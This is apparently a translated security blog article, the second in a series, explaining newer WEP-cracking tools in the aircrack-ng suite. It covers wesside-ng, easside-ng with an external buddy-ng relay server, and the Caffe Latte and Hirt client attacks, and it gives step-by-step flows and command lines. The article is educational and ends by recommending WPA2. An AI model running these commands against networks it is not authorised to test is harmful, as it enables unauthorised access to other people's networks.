Attacks on wireless networks. Part 2

    This is a continuation of the previous article about attacks on wireless access points with WEP protection .

    In the second part of a series of articles on wireless security, we will look at some unconventional attacks on WEP.


    The latest (unstable) version of the aircrack-ng package added several programs that implement new attacks on the WEP protocol.

    The first of these is wesside-ng . In essence, this is a script that automates key cracking. The program has several parameters, but to work, you just need to pass it the name of the network interface used:

    wesside-ng -i wlan0

    The operation algorithm is the same as with manual hacking:

    1. Jumping through the channels reveals a network with WEP.

    2. Fake authentication is performed. If MAC filtering is enabled, the adapter address changes to a valid one.

    3. Authorization is in progress.

    4. A fragmentation attack produces 128 bits of the key stream.

    5. Having caught the ARP packet, the IP address in its body is decrypted. Based on this data, as well as the key stream, a fake ARP packet is created.

    6. The network is filled with fake ARP packets.

    7. Start ptw - attack to calculate the key.

    The second new program is easside-ng . It allows you to connect to a wireless network with WEP without knowing the key itself.

    [caption id = “attachment_294” align = “alignnone” width = “500” caption = “Work scheme easside-ng”] diagram1[/ caption]

    To implement this attack, you must be able to run the easside-ng component - buddy-ng on a server on the Internet. Also, the wireless network and the computer from which you are attacking should be able to communicate with buddy-ng. The scheme of work is quite simple:

    1. A key stream of the greatest possible length (1504 bits) is extracted by a fragmentation attack.

    2. By manipulating with ARP packets we learn the addressing of the network.

    3. Connect to the server and check its performance.

    Further, to transfer the packet to the network, it is converted using the key stream and sent.

    Decryption of the received packet is a little more complicated - first the information necessary for delivering the packet to the server is added to it, and it is sent back to the wireless network. The access point, in turn, decrypts the packet and redirects it to the Internet. The server, having received the packet, will send it to you in the clear.

    This attack is very quiet and fast, because you do not need to send tens of thousands of packets, which distinguishes it from the traditional WEP attack.

    The program starts very simply:

    On an external server - buddy-ng

    And on your computer - easside-ng -f <network interface> -v -c <point channel> -s <external server address>

    And the latest innovation is the new options in aireplay-ng . 2 new parameters allow conducting attacks on clients, extracting a WEP key outside the range of the corresponding network.

    aireplay-ng -6 -h -D <network interface>, for the so-called Caffe Latte attack, and

    aireplay-ng -7 -h -D <network interface>, for a Hirt attack.

    Both of them perform one function, but with slightly different methods. First, ARP is expected - a request from any client within the range of a network card. After that, a small stream of key length is extracted and an ARP is created - a request to which the client will respond.

    Next, airodump-ng starts , packets are collected, and the key is calculated using aircrack-ng .

    Finally, it’s worth noting that these new types of attacks only make hacking Wi-Fi networks with WEP protection even easier. And the only option today is WPA2, PSK or Enterprise.

    In the next article, we will take a detailed look at the possibilities of hacking WPA-protected networks, as well as a new attack on WPA-TKIP, and try to answer the question whether WPA can no longer provide complete confidence in the security of your wireless network.

    Posted by Kozhara Yaroslav , Glaive Security Group

    Also popular now: